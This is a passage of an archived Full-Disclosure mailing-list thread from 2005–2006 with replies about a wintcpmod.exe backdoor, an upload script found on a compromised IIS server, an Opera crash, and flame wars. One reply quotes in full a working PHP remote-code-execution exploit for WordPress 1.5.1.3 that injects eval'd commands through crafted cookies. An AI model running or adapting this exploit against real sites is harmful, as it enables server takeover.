> >
> That makes a great deal of sense. One poster sends
> stuff you find
> offensive, so you want to shut down the entire list?
>
> Yeah, makes perfect sense. Next you'll tell us
> you're going to take your
> ball and go home.
>
> Paul Schmehl (pauls [at] utdallas)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
>

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

toddtowles at brookshires

Jun 3, 2005, 7:41 AM

Post #113 of 180 (2704 views)
Permalink

RE: (no subject) [In reply to]

This could be another bot running on the same filename, but here is
something I found on google

Norton Antivirus 2004(vir def may-2005) report wintcpmod.exe is infected
with W32.DSS.Trojan. The file was deleted and WinXP Sp2 work without
problems.

http://www.what-process.com/process-info.aspx?p=wintcpmod.exe.exe

> -----Original Message-----
> From: full-disclosure-bounces [at] lists
> [mailto:full-disclosure-bounces [at] lists] On Behalf
> Of andy mueller
> Sent: Friday, June 03, 2005 8:17 AM
> To: full-disclosure [at] lists
> Subject: [Full-disclosure] (no subject)
>
>
>
> HI people I have had "wintcpmod" as well so I submitted it
> to norton antivirus and they came back to me with this:
>
>
>
> We have analyzed your submission. The following is a report of our
> findings for each file you have submitted:
>
> filename: C:\WINDOWS\system32\wintcpmod.exe
> machine: ALIEN
> result: This file is infected with Backdoor.Trojan
>
> Developer notes:
> C:\WINDOWS\system32\wintcpmod.exe is non-repairable threat. NAV with
> the latest rapidrelease definition detects this. Please delete this
> file and replace it if neccessary. Please follow the
> instruction at the
> end of this email message to install the latest rapidrelease
> definitions.
>
>
>
> Symantec Security Response has determined that the sample(s) that you
> provided are infected with a virus, worm, or Trojan. We have created
> RapidRelease definitions that will detect this threat. Please
> follow the
> instruction at the end of this email message to download and install
> the latest RapidRelease definitions.
> Downloading and Installing RapidRelease Definition Instructions:
> 1. Open your Web browser. If you are using a dial-up
> connection, connect
> to any Web site, such as: http://securityresponse.symantec.com/
> 2. Click this link to the ftp site:
> ftp://ftp.symantec.com/public/english_us_canada/antivirus_defi
> nitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe.
> If it does not go to the site (this could take a minute or so if you
> have a slow connection), copy and paste the address into the
> address bar
> of your Web browser and then press Enter.
> 3. When a download dialog box appears, save the file to the Windows
> desktop.
> 4. Double-click the downloaded file and follow the prompts.
> ----------------------------------------------------------------------
> This message was generated by Symantec Security Response automation
>
> Should you have any questions about your submission, please contact
> our regional technical support from the Symantec website
> (http://www.symantec.com/techsupp/)
> and give them the tracking number in the subject of this message.
>
> _________________________________________________________________
> Winks & nudges are here - download MSN Messenger 7.0 today!
> http://messenger.msn.co.uk
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

arr at watson

Jun 3, 2005, 9:57 AM

Post #114 of 180 (2714 views)
Permalink

RE: (no subject) [In reply to]

Have you pushed it through Normon Sandbox?

On Fri, 3 Jun 2005, Todd Towles wrote:

:This could be another bot running on the same filename, but here is
:something I found on google
:
:Norton Antivirus 2004(vir def may-2005) report wintcpmod.exe is infected
:with W32.DSS.Trojan. The file was deleted and WinXP Sp2 work without
:problems.
:
: http://www.what-process.com/process-info.aspx?p=wintcpmod.exe.exe
:
:> -----Original Message-----
:> From: full-disclosure-bounces [at] lists
:> [mailto:full-disclosure-bounces [at] lists] On Behalf
:> Of andy mueller
:> Sent: Friday, June 03, 2005 8:17 AM
:> To: full-disclosure [at] lists
:> Subject: [Full-disclosure] (no subject)
:>
:>
:>
:> HI people I have had "wintcpmod" as well so I submitted it
:> to norton antivirus and they came back to me with this:
:>
:>
:>
:> We have analyzed your submission. The following is a report of our
:> findings for each file you have submitted:
:>
:> filename: C:\WINDOWS\system32\wintcpmod.exe
:> machine: ALIEN
:> result: This file is infected with Backdoor.Trojan
:>
:> Developer notes:
:> C:\WINDOWS\system32\wintcpmod.exe is non-repairable threat. NAV with
:> the latest rapidrelease definition detects this. Please delete this
:> file and replace it if neccessary. Please follow the
:> instruction at the
:> end of this email message to install the latest rapidrelease
:> definitions.
:>
:>
:>
:> Symantec Security Response has determined that the sample(s) that you
:> provided are infected with a virus, worm, or Trojan. We have created
:> RapidRelease definitions that will detect this threat. Please
:> follow the
:> instruction at the end of this email message to download and install
:> the latest RapidRelease definitions.
:> Downloading and Installing RapidRelease Definition Instructions:
:> 1. Open your Web browser. If you are using a dial-up
:> connection, connect
:> to any Web site, such as: http://securityresponse.symantec.com/
:> 2. Click this link to the ftp site:
:> ftp://ftp.symantec.com/public/english_us_canada/antivirus_defi
:> nitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe.
:> If it does not go to the site (this could take a minute or so if you
:> have a slow connection), copy and paste the address into the
:> address bar
:> of your Web browser and then press Enter.
:> 3. When a download dialog box appears, save the file to the Windows
:> desktop.
:> 4. Double-click the downloaded file and follow the prompts.
:> ----------------------------------------------------------------------
:> This message was generated by Symantec Security Response automation
:>
:> Should you have any questions about your submission, please contact
:> our regional technical support from the Symantec website
:> (http://www.symantec.com/techsupp/)
:> and give them the tracking number in the subject of this message.
:>
:> _________________________________________________________________
:> Winks & nudges are here - download MSN Messenger 7.0 today!
:> http://messenger.msn.co.uk
:>
:> _______________________________________________
:> Full-Disclosure - We believe in it.
:> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
:> Hosted and sponsored by Secunia - http://secunia.com/
:>
:_______________________________________________
:Full-Disclosure - We believe in it.
:Charter: http://lists.grok.org.uk/full-disclosure-charter.html
:Hosted and sponsored by Secunia - http://secunia.com/
:
:

--
Andrew R. Reiter
arr [at] watson
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

kf_lists at digitalmunition

Aug 9, 2005, 9:13 AM

Post #115 of 180 (2695 views)
Permalink

Re: (no subject) [In reply to]

Maybe next I can enjoy a subject line?
-KF

kartoffelguru [at] hush wrote:

>now enjoy as attachment...
>
>
>------------------------------------------------------------------------
>
><?php
> echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n";
> echo "(C) Copyright 2005 Kartoffelguru\n\n";
> echo "[!] info: requires register_globals turned on on target host\n\n";
> if (!extension_loaded('curl')) {
> die ("[-] you need the curl extension activated...\n");
> }
>
> function usage()
> {
> die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n\n");
> }
>
> $options = getopt("h:c:");
> if (count($options) < 1 || !isset($options['h'])) {
> usage();
> }
>
> $host = (is_array($options['h']) ? $options['h'][0]:$options['h']);
> $cmd = (is_array($options['c']) ? $options['c'][0]:$options['c']);
>
> if (!preg_match("/^http:\/\//", $host, $dummy)) {
> usage();
> }
>
> if (strlen(trim($cmd))==0) {
> $cmd = 'phpinfo();';
> }
>
> $code = base64_encode($cmd);
> $cnv = "";
> for ($i=0;$i<strlen($code); $i++) {
> $cnv.= "chr(".ord($code[$i]).").";
> }
> $cnv.="chr(32)";
>
> $str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');
>
> $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;';
> $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;';
> $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
> $cookie.=$str;
> $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;';
> $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;';
> $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;';
>
> $ch = curl_init();
> curl_setopt($ch, CURLOPT_URL, $host);
> curl_setopt($ch, CURLOPT_POST, 0);
> curl_setopt($ch, CURLOPT_COOKIE, $cookie);
> curl_setopt($ch, CURLOPT_HEADER, 0);
> curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
> curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
> curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
> curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
> echo "[+] now executing\n\n";
>
> $r = curl_exec($ch);
> curl_close($ch);
>
> echo $r;
>
>?>
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

stan.bubrouski at gmail

Aug 9, 2005, 10:26 AM

Post #116 of 180 (2681 views)
Permalink

Re: (no subject) [In reply to]

LOL, and he didn't pt a subject on either message...

On 8/9/05, KF (lists) <kf_lists [at] digitalmunition> wrote:
> Maybe next I can enjoy a subject line?
> -KF
>
<SNIP>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

ademar.gonzalez at gmail

Sep 28, 2005, 7:38 AM

Post #117 of 180 (2690 views)
Permalink

Re: (no subject) [In reply to]

Hi Aditya

On 9/28/05, Aditya Deshmukh
<aditya.deshmukh [at] online> wrote:
> Recently 2 days ago I saw this in a compromised system.
>
>
> Both this file and cpshost.dll were deleted from C:\InetPub\scripts
> This file was recovered but I was unable to recover cpshost.dll....
>
>
> Anyone know what is this ?
>

It is a upload script, cpshost.dll is the Posting Acceptor ActiveX control :

http://support.microsoft.com/kb/q230298/

>
> <% Response.Buffer = TRUE %>
>
> Version=1.5
> <%
> PathToPA = "http://" + Request.ServerVariables("SERVER_NAME") +
> "/scripts/cpshost.dll"
>
>
> PostingURL = PathToPA + "?PUBLISH"
>
> TargetURL = "http://" + Request.ServerVariables("SERVER_NAME")
> %>
>
> [{8B14B770-748C-11D0-A309-00C04FD7CFC5}]
> PostingURL="<%= PostingURL %>"
> TargetURL="<%= TargetURL %>"
> ComponentInstall="yes"
>

ciao ciao
ademar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

stevenrakick at yahoo

Mar 4, 2006, 8:28 PM

Post #118 of 180 (2638 views)
Permalink

Re: (no subject) [In reply to]

Not that it matters but...

Received: from www.c0replay.net (unknown
[206.251.72.74])
by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
for <full-disclosure [at] lists>;
Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure [at] lists
From: Steven Rakick <stevenrakick [at] yahoo>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59 [at] www>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

perfect.material at gmail

Mar 4, 2006, 9:34 PM

Post #119 of 180 (2647 views)
Permalink

Re: (no subject) [In reply to]

Dick Breath,

You should sign your electronic mail with some unhackable crypto
technology. That way you will never need to show off your cut and paste
technology to the others. You are irresponsible. Not that it matters but...

PERFECT.MATERIAL

On 3/4/06, Steven Rakick <stevenrakick [at] yahoo> wrote:
>
> Not that it matters but...
>
> Received: from www.c0replay.net (unknown
> [206.251.72.74])
> by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
> for <full-disclosure [at] lists>;
> Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
> Date: Sat, 4 Mar 2006 18:01:51 -0800
> To: full-disclosure [at] lists
> From: Steven Rakick <stevenrakick [at] yahoo>
> Message-ID:
> <1e7e8bed62fc8c339e776bd2ef170a59 [at] www>
> X-Priority: 3
> X-Mailer: PHPMailer [version 1.73]
>
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

nick at nickwithers

Mar 27, 2006, 6:19 PM

Post #120 of 180 (2571 views)
Permalink

Re: (no subject) [In reply to]

On Tue, 28 March, 2006 10:00 am, Alexander Hristov wrote:
> IM not saying the entire disk !

Well, logically speaking a partition is essentially an "entire disk", even
if it is one of 14 hypothetical "entire disks".

> Only the partition u choose the torrent to be saved in has to be full
> Like when u have 14 partitions and one of them is full i dont think
> this is a problem ?

It is if you're trying to write more data to it! :-)

> So this is a security bug

Not sure if you'd call it a *security* bug. Certainly should be handled
better though!

> On 3/27/06, Stan Bubrouski <stan.bubrouski [at] gmail> wrote:
>> This really doesn't seem like a security bug though... sure some site
>> could target opera users and try to force them to download torrents,
>> but when your disk is already full this sounds like the least of your
>> problems...
>>
>> -sb
>>
>> On 3/27/06, Alexander Hristov <joffer [at] gmail> wrote:
>> > Opera > 8.02 with torrent support cant handle not enough space on
>> drive
>> >
>> > If your partition is full and u choose to save a torrent on this
>> > partition opera will start using 100% of your cpu and momery and
>> > eventually crash
>> >
>> > Tested with opera 9 p 2
>> > --
>> > Best Regards,
>> > Aleksander Hristov < root at securitydot.net > <
>> http://securitydot.net >
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>
>
> --
> Best Regards,
> Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

P.S.: Sorry about my time zone not being set correctly!

--
Nick Withers
email: nick [at] nickwithers
Web: http://www.nickwithers.com
Mobile: +61 414 397 446

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

octetstream at gmail

Mar 30, 2006, 1:08 PM

Post #121 of 180 (2567 views)
Permalink

Re: (no subject) [In reply to]

On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
>
> The most powerful hackers in the world being told to get off fd, well that
> says a lot for fd then doesn't it. I'll be off and leave you skids to it. I
> don't want to hold up your list of "free vulnerabilities and exploits" which
> you stalk this list for, because none of you can find your own
> vulnerabilities to hack the planet with, bye.
>
>
If by powerful you mean retarded and by hackers you mean retards... You
haven't contributed shit to this list other than noise you moron. Come back
when you grow some pubes or after the brain transplant.

stan.bubrouski at gmail

Mar 30, 2006, 2:06 PM

Post #122 of 180 (2566 views)
Permalink

Re: (no subject) [In reply to]

Name one powerful hacker kicked out of here? Just one. And you don't
count (niether do I but I've never claimed to be an expert or
important).

-sb

On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
> The most powerful hackers in the world being told to get off fd, well that
> says a lot for fd then doesn't it. I'll be off and leave you skids to it. I
> don't want to hold up your list of "free vulnerabilities and exploits" which
> you stalk this list for, because none of you can find your own
> vulnerabilities to hack the planet with, bye.
>
>
> On 3/30/06, s89df987 s9f87s987f <a059d8e0a9s8d0 [at] hotmail> wrote:
> > n3td3v be gone like you said you would.
> >
> > and Kevin Mitnick is just a flashy name used to get ppl to buy
> >
> > On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
> > >
> > >Nah dude, he stood in defence of Kevin Mitnick, works with the UN,
> > >whitehouse, fbi etc. He's a world leading advisor with much infulence on
> > >the
> > >super powers of the world in relation to information technology security.
> > >
> http://www.nytimes.com/2005/07/31/business/yourmoney/31hack.html?ex=1280462400&en=311d897de4ab090a&ei=5088&partner=rssnyt&emc=rss
> > > http://www.msbit.com/mis.html
> > >http://www.cutter.com/consultants/seidenm.html He's
> highly respected in
> > >the government and corporate circuits of the world.
> > >Everytime I speak to him he's in another part of the world preparing to
> go
> > >into talks with a government or corporation. By no means a script kid who
> > >got lucky. He and people as high up as him are the real people who run
> U-S
> > >government and corporate interests. We all know when we think of George W
> > >Bush, we all know he's not that powerful and takes advice from the real
> > >advisors in control of the world, that you never see or hear about in
> > >public, well Seiden is your man.
> > >
> > > On 3/30/06, Valdis.Kletnieks [at] vt <Valdis.Kletnieks [at] vt> wrote: >
> > >On Wed, 29 Mar 2006 23:36:28 +0100, n3td3v said:
> > > > > You mean like Seiden who broke into banks and told everyone about
> it,
> > >and is > > now one of the biggest security experts in the industry. He
> sent
> > >me an
> > > > > e-mail telling me a week or so back telling me to take you
> seriously,
> > >i'm
> > > > > beginning to wonder why.
> > > > > On Wed, 29 Mar 2006 23:56:48 +0100, n3td3v said: > > thats the
> current
> > >situation, upto date. Seiden at yahoo (security
> > > > > consultant/advisor/hacker) whatever you want to call him is now
> pissed
> > >off
> > > > > because he's getting no info feed into his corporate security team >
> >
> > >anymore...
> > > > > You'd think if Seiden was leet enough to break into banks, he'd be
> > >able to
> > > > apply the same techniques to Yahoo and not need an external feed.
> > >Unless
> > >of
> > > > course he was just a skiddy who whacked the banks with some exploit he
> > >stole > from somebody else and didn't understand....
> > > > > > >
> > >
> > > _______________________________________________
> > >Full-Disclosure - We believe in it.
> > >Charter:
> > > http://lists.grok.org.uk/full-disclosure-charter.html
> > >Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > >
> >
> >
> _________________________________________________________________
> > Express yourself instantly with MSN Messenger! Download today - it's FREE!
> >
> http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

very at unprivate

Mar 30, 2006, 2:27 PM

Post #123 of 180 (2564 views)
Permalink

RE: (no subject) [In reply to]

No, please.. Really, keep your word just this one time.

-----Original Message-----
From: full-disclosure-bounces [at] lists
[mailto:full-disclosure-bounces [at] lists] On Behalf Of n3td3v
Sent: Thursday, March 30, 2006 10:55 PM
To: s89df987 s9f87s987f; full-disclosure [at] lists
Subject: Re: [Full-disclosure] (no subject)

The most powerful hackers in the world being told to get off fd, well
that says a lot for fd then doesn't it. I'll be off and leave you skids
to it. I don't want to hold up your list of "free vulnerabilities and
exploits" which you stalk this list for, because none of you can find
your own vulnerabilities to hack the planet with, bye.

On 3/30/06, s89df987 s9f87s987f <a059d8e0a9s8d0 [at] hotmail> wrote:

n3td3v be gone like you said you would.

and Kevin Mitnick is just a flashy name used to get ppl to buy

On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
>
>Nah dude, he stood in defence of Kevin Mitnick, works with the UN,
>whitehouse, fbi etc. He's a world leading advisor with much infulence
on
>the
>super powers of the world in relation to information technology
security.
>
<http://www.nytimes.com/2005/07/31/business/yourmoney/31hack.html?ex=128
0462400&en=311d897de4ab090a&ei=5088&partner=rssnyt&emc=rss>
http://www.nytimes.com/2005/07/31/business/yourmoney/31hack.html?ex=1280
462400&en=311d897de4ab090a&ei=5088&partner=rssnyt&emc=rss
> http://www.msbit.com/mis.html <http://www.msbit.com/mis.html>
>http://www.cutter.com/consultants/seidenm.html He's highly respected
in
>the government and corporate circuits of the world.
>Everytime I speak to him he's in another part of the world preparing to
go
>into talks with a government or corporation. By no means a script kid
who
>got lucky. He and people as high up as him are the real people who run
U-S
>government and corporate interests. We all know when we think of George
W
>Bush, we all know he's not that powerful and takes advice from the real
>advisors in control of the world, that you never see or hear about in
>public, well Seiden is your man.
>
> On 3/30/06, Valdis.Kletnieks [at] vt <Valdis.Kletnieks [at] vt> wrote:
>
>On Wed, 29 Mar 2006 23:36:28 +0100, n3td3v said:
> > > You mean like Seiden who broke into banks and told everyone about
it,
>and is > > now one of the biggest security experts in the industry. He
sent
>me an
> > > e-mail telling me a week or so back telling me to take you
seriously,
>i'm
> > > beginning to wonder why.
> > > On Wed, 29 Mar 2006 23:56:48 +0100, n3td3v said: > > thats the
current
>situation, upto date. Seiden at yahoo (security
> > > consultant/advisor/hacker) whatever you want to call him is now
pissed
>off
> > > because he's getting no info feed into his corporate security team
> >
>anymore...
> > > You'd think if Seiden was leet enough to break into banks, he'd be
>able to
> > apply the same techniques to Yahoo and not need an external feed.
>Unless
>of
> > course he was just a skiddy who whacked the banks with some exploit
he
>stole > from somebody else and didn't understand....
> > > > >
>
> _______________________________________________
>Full-Disclosure - We believe in it.
>Charter:
> <http://lists.grok.org.uk/full-disclosure-charter.html>
http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's
FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
<http://lists.grok.org.uk/full-disclosure-charter.html>
Hosted and sponsored by Secunia - http://secunia.com/

hdw at kallisti

Mar 30, 2006, 2:36 PM

Post #124 of 180 (2565 views)
Permalink

Re: (no subject) [In reply to]

Stan Bubrouski wrote:
> Name one powerful hacker kicked out of here? Just one. And you don't
> count (niether do I but I've never claimed to be an expert or
> important).
Kicked from a public un-moderated mailing list?

How?

Now, if you don't like the noise, why don't you just shut the fuck up instead of answering the trolls?

The noise isn't the idiot mailings, the noise is people who should know better answering the morons.

_don't answer morons_ it serves no porpose.

If someone posts something that is misguided or bad, then sure correct me (or us).
But if someone posts something moronic, then please ignore.
You're only helping the moron.

I again refrain to the best proverb I've heard (and he's windows guru, shudder)

"Don't argue with an idiot, he'll just drag the discussion to his level and beat you with experience."

So, if someone post something silly or moronic, giggle, groan and delete.
Do _not_ respond to prove that he (or remotely possibly she) is a moron,
If we haven't got that already we have ourself to blame.

Oh, and of course, this is for 'us', boring grayhats who want to read a clean list of the latest expliots every morning.

Non-grayhats who want to annoy us are of course free to do so, after all, it is un-moderated and it's full-disclosure.

So configure your frikken filters and stop responsing to idiots.

// hdw

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

n3td3v at gmail

Mar 30, 2006, 3:11 PM

Post #125 of 180 (2566 views)
Permalink

Re: (no subject) [In reply to]

Funny you should think FD isn't already moderated, our main
xploitable [at] gmail address has been moderated for months, hence the reason
we're using n3td3v [at] gmail . This might be an interesting read for you
"freedom of speech" Americans, who are currently bombing the hell out of the
middle east to uphold, yet on FD, there is no democracy and freedom of
expression...

http://groups.google.com/group/n3td3v/browse_thread/thread/34e8f243bbddaf3e/ac7e9f73de66f10f

http://groups.google.com/group/n3td3v/browse_thread/thread/64a322968d71fe3b/d3db5e88d9f91d88

http://groups.google.com/group/n3td3v/msg/5b3d7afe80dde4d3

Someone tell George W Bush to drop a bomb on John Cartwright's head, since
he doesn't believe in "freedom", he must be a terrorist.... ;-)

We ask John Cartwright to unmoderate xploitable [at] gmail or you must be
with the terrorists... and if you don't then someone might need to tell
president [at] whitehouse and then you might get mentioned on his press
conferences or radio addresses as being part of the "axis of evil".

On 3/30/06, Anders B Jansson <hdw [at] kallisti> wrote:
>
> Stan Bubrouski wrote:
> > Name one powerful hacker kicked out of here? Just one. And you don't
> > count (niether do I but I've never claimed to be an expert or
> > important).
> Kicked from a public un-moderated mailing list?
>
> How?
>
> Now, if you don't like the noise, why don't you just shut the fuck up
> instead of answering the trolls?
>
> The noise isn't the idiot mailings, the noise is people who should know
> better answering the morons.
>
> _don't answer morons_ it serves no porpose.
>
> If someone posts something that is misguided or bad, then sure correct me
> (or us).
> But if someone posts something moronic, then please ignore.
> You're only helping the moron.
>
> I again refrain to the best proverb I've heard (and he's windows guru,
> shudder)
>
> "Don't argue with an idiot, he'll just drag the discussion to his level
> and beat you with experience."
>
> So, if someone post something silly or moronic, giggle, groan and delete.
> Do _not_ respond to prove that he (or remotely possibly she) is a moron,
> If we haven't got that already we have ourself to blame.
>
> Oh, and of course, this is for 'us', boring grayhats who want to read a
> clean list of the latest expliots every morning.
>
> Non-grayhats who want to annoy us are of course free to do so, after all,
> it is un-moderated and it's full-disclosure.
>
> So configure your frikken filters and stop responsing to idiots.
>
> // hdw
>
>
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

1 2 3 4 5 6 7 8

View All

Index | Next | Previous | View Threaded

Interested in having your list archived? Contact Gossamer Threads